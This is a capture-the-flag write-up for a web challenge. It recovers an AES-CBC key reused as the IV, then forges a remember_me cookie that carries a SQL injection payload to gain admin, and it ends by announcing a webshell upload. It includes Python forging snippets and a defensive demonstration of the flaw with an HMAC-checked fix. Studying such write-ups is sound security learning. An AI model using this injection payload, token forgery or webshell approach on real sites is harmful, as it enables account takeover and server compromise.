At first, if you launch dirsearch/dirbuster or anything else that lists files on the server, you find a backup.bak, which contains the source code of the challenge. Alternatively, you click on the link in the hint. It is a zip file that contains:
The only thing to do is to register a user, get their remember_me cookie, and write a small script to build a forged token in order to obtain its plain version through the website. I used the "aaaa" account created by someone else (thank you).
```python
from base64 import b64decode

# genstring() and genblock() are helpers from the author's script (not shown here):
# genblock() splits the decoded token into its bytes, genstring() re-encodes a block list.
print("Token to test : %s" % genstring(new_token_blocks))

# Plain text of new_token which is given by the website =>
# MrVg19rbkubNc1+9FaTSIIrbIMWBFrqYuLnTn5TM6v1fgQe24/bg1PwYPJE05PYBvoEkjFL51BhAaubCvJBhyQ==
plain_text = "MrVg19rbkubNc1+9FaTSIIrbIMWBFrqYuLnTn5TM6v1fgQe24/bg1PwYPJE05PYBvoEkjFL51BhAaubCvJBhyQ=="
plain_blocks = genblock(b64decode(plain_text))

# Apply the formula P1 XOR P3 to get the key (P3 is the third 16-byte block, offset 32).
# The original snippet XORed plain_blocks[i] with itself, which always yields 0.
key = bytes(plain_blocks[i] ^ plain_blocks[32 + i] for i in range(16))
```
The next step is to log in as admin in the application. To do this, we have to find a user who is an admin, or trick the system: ' and 1=0 union select username, 1 from Users where username='aaaa.
The application then understands that the "aaaa" user is an admin.
Let's forge the token:
```python
from Crypto.Cipher import AES

# Same construction as the application: the key is reused as the IV.
encryption_suite = AES.new(key, AES.MODE_CBC, key)
print("Token to do SQLinjection (urlencode format): ")
# padding() and urlb64encode() are helpers from the author's script (not shown here)
print(urlb64encode(encryption_suite.encrypt(padding("' and 1=0 union select username, 1 from Users where username='aaaa|thisisareallyreallylongstringasfalsfassfasfaasff"))))
```
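To make the root cause of both steps above concrete, here is an added example (not from the writeup or the challenge source) that shows why CBC with IV == key leaks the key through any "decrypt and show me the plaintext" feature, next to the hardened token format that rejects a modified cookie before decrypting it. It uses a toy 4-round Feistel cipher built on HMAC-SHA256 in place of AES (the property only depends on CBC chaining, not on the block cipher), assumes plaintexts that are a multiple of 16 bytes, and uses constructed keys and cookie contents.

```python
import hmac, hashlib, secrets
BLOCK = 16

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):  # toy round function: keyed HMAC-SHA256 cut to a half block
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def enc_block(key, block):  # 4-round Feistel: a toy keyed permutation standing in for AES
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, r, i))
    return l + r

def dec_block(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, l, i)), l
    return l + r

def cbc_encrypt(key, iv, pt):  # pt must be a multiple of BLOCK; no padding in this toy
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = enc_block(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(dec_block(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def key_leak_from_key_as_iv(key, ct):
    # The flaw on the page: with IV == key, decrypting C1 || 0 || C1 yields P1 XOR P3 == key.
    plain = cbc_decrypt(key, key, ct[:BLOCK] + bytes(BLOCK) + ct[:BLOCK])
    return _xor(plain[:BLOCK], plain[2 * BLOCK:3 * BLOCK])

def make_token(enc_key, mac_key, pt):
    iv = secrets.token_bytes(BLOCK)  # fresh random IV, never the key
    ct = cbc_encrypt(enc_key, iv, pt)
    return iv + ct + hmac.new(mac_key, iv + ct, hashlib.sha256).digest()

def open_token(enc_key, mac_key, token):
    iv, ct, tag = token[:BLOCK], token[BLOCK:-32], token[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, iv + ct, hashlib.sha256).digest()):
        return None  # any modified ciphertext is rejected before it is ever decrypted
    return cbc_decrypt(enc_key, iv, ct)
```

With the tag check in place, the C1 || 0 || C1 cookie and the SQL-injection cookie are both refused, so the decrypted value can never reach the query without having been produced by the server.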
As the flag is stored in the website's source code, we have to read it through a webshell. Why a webshell? Because there is no user-controlled input on the website that can lead to command execution, and the application offers an upload functionality.